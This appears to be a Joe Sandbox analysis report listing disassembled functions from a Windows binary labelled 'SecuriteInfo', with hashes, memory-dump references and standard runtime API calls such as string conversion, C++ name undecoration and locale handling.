Instruction ID: ea38daa417db1be52a5e8c84b42f4461a36fea6e751cb5ecc77a9031043a54d4
Opcode Fuzzy Hash: a8a24a4fbd381659de37e717250db654be4ed2444497cfb6211b0140c6bb7f96
Instruction Fuzzy Hash: F1018C7AD006158BCF05EBA4C9657AD77A1BF80724F284009E8126B2E3DF749E45AB91

Function 00C48154 Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00C4819D
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00C48208
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C48225
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00C48264
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C482C3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C482E6

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 76b096eabca1e0f0a919df2fdf85d5677869c9594e43162b086db93bd05d8229
Instruction ID: 23c0cf3efb8352245a4bab0946b289b6d873a52746549fc51c6d0b88ce016038
Opcode Fuzzy Hash: 76b096eabca1e0f0a919df2fdf85d5677869c9594e43162b086db93bd05d8229
Instruction Fuzzy Hash: 8751CE72500616ABEB209FA5CC45FAF3BB9FF44B40F154025FE15A6160DB708E09DB60

Function 00C9238F Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00C9256B

Part of subcall function 00C8E33C: DName::doPchar.LIBCMT ref: 00C8E365

DName::DName.LIBCMT ref: 00C925FB
DName::operator+.LIBCMT ref: 00C92602
DName::DName.LIBCMT ref: 00C92625
DName::operator+.LIBCMT ref: 00C9262C
DName::operator+=.LIBCMT ref: 00C92638
DName::operator=.LIBCMT ref: 00C9265F
DName::operator+=.LIBCMT ref: 00C92671
DName::operator=.LIBCMT ref: 00C92685
UnDecorator::getPtrRefType.LIBCMT ref: 00C9269A
operator+.LIBCMT ref: 00C926AC

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
Instruction ID: f9507354c4727d0e882d2b1ef1dfccaf1e3616174580c9ac45efbef85f9999d3
Opcode Fuzzy Hash: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
Instruction Fuzzy Hash: BE214F76A0410ABFCF18EEB8C96D9FDBBB4AF04302F15416AE8A1D7645DA309F449B10

Function 00C92385 Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator=.LIBCMT ref: 00C9256B

Part of subcall function 00C8E33C: DName::doPchar.LIBCMT ref: 00C8E365

DName::DName.LIBCMT ref: 00C925FB
DName::operator+.LIBCMT ref: 00C92602
DName::DName.LIBCMT ref: 00C92625
DName::operator+.LIBCMT ref: 00C9262C
DName::operator+=.LIBCMT ref: 00C92638
DName::operator=.LIBCMT ref: 00C9265F
DName::operator+=.LIBCMT ref: 00C92671
DName::operator=.LIBCMT ref: 00C92685
UnDecorator::getPtrRefType.LIBCMT ref: 00C9269A
operator+.LIBCMT ref: 00C926AC

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
Instruction ID: 59bfe3940cf2cfab4e91dfa7bbca56c53362dcc03f44157083f83323a91fc73d
Opcode Fuzzy Hash: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
Instruction Fuzzy Hash: E3214276A0410ABFCF18EEB8C95D9FD7B74AF04302F15416AE8A1D7645DA30DF449B10

Function 00C92399 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00C9256B

Part of subcall function 00C8E33C: DName::doPchar.LIBCMT ref: 00C8E365

DName::DName.LIBCMT ref: 00C925FB
DName::operator+.LIBCMT ref: 00C92602
DName::DName.LIBCMT ref: 00C92625
DName::operator+.LIBCMT ref: 00C9262C
DName::operator+=.LIBCMT ref: 00C92638
DName::operator=.LIBCMT ref: 00C9265F
DName::operator+=.LIBCMT ref: 00C92671
DName::operator=.LIBCMT ref: 00C92685
UnDecorator::getPtrRefType.LIBCMT ref: 00C9269A
operator+.LIBCMT ref: 00C926AC

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
Instruction ID: 2e5ffef00060a1fd09002eddb0a447b3dff70728291a51c6ad6fac23c7107ad8
Opcode Fuzzy Hash: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
Instruction Fuzzy Hash: 72214F76A0410ABFCF18EEB8C96D9FDBBB4AF04302F15416AE8A1D7645DA349F449B10

Function 00C9237B Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator=.LIBCMT ref: 00C9256B

Part of subcall function 00C8E33C: DName::doPchar.LIBCMT ref: 00C8E365

DName::DName.LIBCMT ref: 00C925FB
DName::operator+.LIBCMT ref: 00C92602
DName::DName.LIBCMT ref: 00C92625
DName::operator+.LIBCMT ref: 00C9262C
DName::operator+=.LIBCMT ref: 00C92638
DName::operator=.LIBCMT ref: 00C9265F
DName::operator+=.LIBCMT ref: 00C92671
DName::operator=.LIBCMT ref: 00C92685
UnDecorator::getPtrRefType.LIBCMT ref: 00C9269A
operator+.LIBCMT ref: 00C926AC

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
Instruction ID: f00bf157de0193e1c3fa3d350a7878b383e19b5f2483d9a1d8076b97a52132f9
Opcode Fuzzy Hash: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
Instruction Fuzzy Hash: 93214276A0410ABECF18EEB8C95D9FDBB749F04302F15416AE4A1D7645DA309F449B10

Function 00C46A1C Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C46A23
std::_Lockit::_Lockit.LIBCPMT ref: 00C46A2D
int.LIBCPMT ref: 00C46A44

Part of subcall function 00C416FA: std::_Lockit::_Lockit.LIBCPMT ref: 00C4170B
Part of subcall function 00C416FA: std::_Lockit::~_Lockit.LIBCPMT ref: 00C41725

std::_Facet_Register.LIBCPMT ref: 00C46A7E
std::_Lockit::~_Lockit.LIBCPMT ref: 00C46A9E
Concurrency::cancel_current_task.LIBCPMT ref: 00C46AAB

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 37659a3c191066238de583e353fd7169496f6fabc4a0d004e35294b59ca918cf
Instruction ID: 95e78757526413372e812f10401fd306cdbd85a4f24bc12cc558cad7834e3ff5
Opcode Fuzzy Hash: 37659a3c191066238de583e353fd7169496f6fabc4a0d004e35294b59ca918cf
Instruction Fuzzy Hash: 3411D3769106159BCB14EB68D8417AE77B4FF85720F24440EF416A7282DF70EE44AB81

Function 00C4B8EA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C4B8E1,00C49C42,00C49198), ref: 00C4B8F8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C4B906
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C4B91F
SetLastError.KERNEL32(00000000,00C4B8E1,00C49C42,00C49198), ref: 00C4B971

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6e33dcb2dff872b80778c2ade49d1eaeec11221e3333d03ef7e290c60f81dd32
Instruction ID: 887d4cfc161d243687981b7c78c4af867e0ecdeabcf7e3a69243dbf56d2e44c4
Opcode Fuzzy Hash: 6e33dcb2dff872b80778c2ade49d1eaeec11221e3333d03ef7e290c60f81dd32
Instruction Fuzzy Hash: BD01D43350E712AEE66826B67DCAB2E2BA5FB11771B20023DF220550F1EF928C02A141

Function 00C9702B Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00C96F82

Part of subcall function 00C8CDB0: __mtinitlocknum.LIBCMT ref: 00C8CDC6
Part of subcall function 00C8CDB0: __amsg_exit.LIBCMT ref: 00C8CDD2

_free.LIBCMT ref: 00C96FA9
__lock.LIBCMT ref: 00C96FC2
___removelocaleref.LIBCMT ref: 00C96FD1
___freetlocinfo.LIBCMT ref: 00C96FEA
_free.LIBCMT ref: 00C97007

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: __lock_free$___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 1181530324-0
Opcode ID: ea7ce77e31b3f7d8e0d2d0418bb568a4f25cd6cb92cdbed38c33d881490c5e64
Instruction ID: c25c7f2cdead0b486f1c0bb7f789d25be0181a682011a4c77041f8e386d7b9a4
Opcode Fuzzy Hash: ea7ce77e31b3f7d8e0d2d0418bb568a4f25cd6cb92cdbed38c33d881490c5e64
Instruction Fuzzy Hash: A311C272506704AADF30BFB8A84D71D77E4AF00B20F20456AF4A4DB2C1DB34DA80A768

Function 00C52A4D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,27568A11,?,?,00000000,00C63BD8,000000FF,?,00C529DD,00C52B0D,?,00C529B1,00000000), ref: 00C52A82
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C52A94
FreeLibrary.KERNEL32(00000000,?,?,00000000,00C63BD8,000000FF,?,00C529DD,00C52B0D,?,00C529B1,00000000), ref: 00C52AB6

Strings

mscoree.dll, xrefs: 00C52A7B
CorExitProcess, xrefs: 00C52A8C

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5ab5b7e9273c8f26a03f4e034eee9ab8791984d195cde8c5857910282e4c23b7
Instruction ID: 883d560b571301f8356e01c6f32e9bc0ae870dc648cb1561ef13a72b117ee0a2
Opcode Fuzzy Hash: 5ab5b7e9273c8f26a03f4e034eee9ab8791984d195cde8c5857910282e4c23b7
Instruction Fuzzy Hash: FF01DB31604665EFDB358F51DC05FAE7BF8FF05B15F000629FC21A2290DBB49940CA50

Function 00C83BF8 Relevance: 7.8, APIs: 5, Instructions: 297COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C83C7F
_memset.LIBCMT ref: 00C83C90
_memset.LIBCMT ref: 00C83D58
_memset.LIBCMT ref: 00C83DC4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C83EE6

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: _memset$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 2583058844-0
Opcode ID: 573c43b678cf46433a9d52bda08d28013d17d570466941bc540ea4b34d10235b
Instruction ID: 4503defc9a5a11937dc46ce4c63aaccce2449ae6cc938dd469cdcf1988f7e1d5
Opcode Fuzzy Hash: 573c43b678cf46433a9d52bda08d28013d17d570466941bc540ea4b34d10235b
Instruction Fuzzy Hash: F1C158B2D0021AABCF21EF64DC85AEE777DAF08304F0584A5FA08A3151DB35AF859F55

Function 00C93B97 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 00C93BAB
__init_pointers.LIBCMT ref: 00C93C5D
__calloc_crt.LIBCMT ref: 00C93CCB
__initptd.LIBCMT ref: 00C93CF0

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: __calloc_crt__init_pointers__initptd__mtterm
String ID:
API String ID: 3132042578-0
Opcode ID: 7a564709ad00560bd9d8fdbd701ed2ecb4aa1347a6a992db256615f12604ae46
Instruction ID: 7c577b4902890b2f4a1d4f5d654fa8b8ab578982f561950e85bea58c0304fdc9
Opcode Fuzzy Hash: 7a564709ad00560bd9d8fdbd701ed2ecb4aa1347a6a992db256615f12604ae46
Instruction Fuzzy Hash: 5F315C32D08390EADF206F75AC18A073FA4AF45721B10163AE424D35B1DB75CE80DF59

Function 00C43D64 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C43D70
int.LIBCPMT ref: 00C43D83

Part of subcall function 00C416FA: std::_Lockit::_Lockit.LIBCPMT ref: 00C4170B
Part of subcall function 00C416FA: std::_Lockit::~_Lockit.LIBCPMT ref: 00C41725

std::_Facet_Register.LIBCPMT ref: 00C43DB6
std::_Lockit::~_Lockit.LIBCPMT ref: 00C43DCC
Concurrency::cancel_current_task.LIBCPMT ref: 00C43DD7

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 9f1cb311b526a1608cc52f419b097370394deb46f139a4698d1b3d99425c5930
Instruction ID: 7bb83c5c4ec98622e48a51eee478412d1c9cb76401ec6986014b75d7b2720c93
Opcode Fuzzy Hash: 9f1cb311b526a1608cc52f419b097370394deb46f139a4698d1b3d99425c5930
Instruction Fuzzy Hash: 4F112B36A10514ABCB08BB58D8169ED7758FFC0720F140149FD569B2D2EF30AF01A7C4

Function 00C8EAA2 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 00C8EAEB
DName::operator+.LIBCMT ref: 00C8EAF2
DName::DName.LIBCMT ref: 00C8EB14
DName::operator+.LIBCMT ref: 00C8EB1B
DName::operator+.LIBCMT ref: 00C8EB22

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: 07d7777d52dff5e113e7891794bf6f50c10d3f38d43dc9179de300c9a186e5fe
Instruction ID: 9b8d5739b23b5febd5093cda23345f5320fa0f1853bcabbe77646236aad5864f
Opcode Fuzzy Hash: 07d7777d52dff5e113e7891794bf6f50c10d3f38d43dc9179de300c9a186e5fe
Instruction Fuzzy Hash: 9B015230600209AFDF04FFA4D886EEE7BB9EF44748F544055F902AB292DA70EA45978C

Function 00C440BA Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C440C6
int.LIBCPMT ref: 00C440D9

Part of subcall function 00C416FA: std::_Lockit::_Lockit.LIBCPMT ref: 00C4170B
Part of subcall function 00C416FA: std::_Lockit::~_Lockit.LIBCPMT ref: 00C41725

std::_Facet_Register.LIBCPMT ref: 00C4410C
std::_Lockit::~_Lockit.LIBCPMT ref: 00C44122
Concurrency::cancel_current_task.LIBCPMT ref: 00C4412D

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 6dccdb90eb5844e2c148cb7a4b4b26a74ef71994aec080c3b7ad6bab775b7052
Instruction ID: a5101d440a532605b8377f7e91a6d2fcd9d42b8ffa625a12b921d0ca1fd5743f
Opcode Fuzzy Hash: 6dccdb90eb5844e2c148cb7a4b4b26a74ef71994aec080c3b7ad6bab775b7052
Instruction Fuzzy Hash: 3B01D676900114BBCB18AF54D806ADE7778FF80760F290159F91697292EF30EF41E780

Function 00C44577 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C44583
int.LIBCPMT ref: 00C44596

Part of subcall function 00C416FA: std::_Lockit::_Lockit.LIBCPMT ref: 00C4170B
Part of subcall function 00C416FA: std::_Lockit::~_Lockit.LIBCPMT ref: 00C41725

std::_Facet_Register.LIBCPMT ref: 00C445C9
std::_Lockit::~_Lockit.LIBCPMT ref: 00C445DF
Concurrency::cancel_current_task.LIBCPMT ref: 00C445EA

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

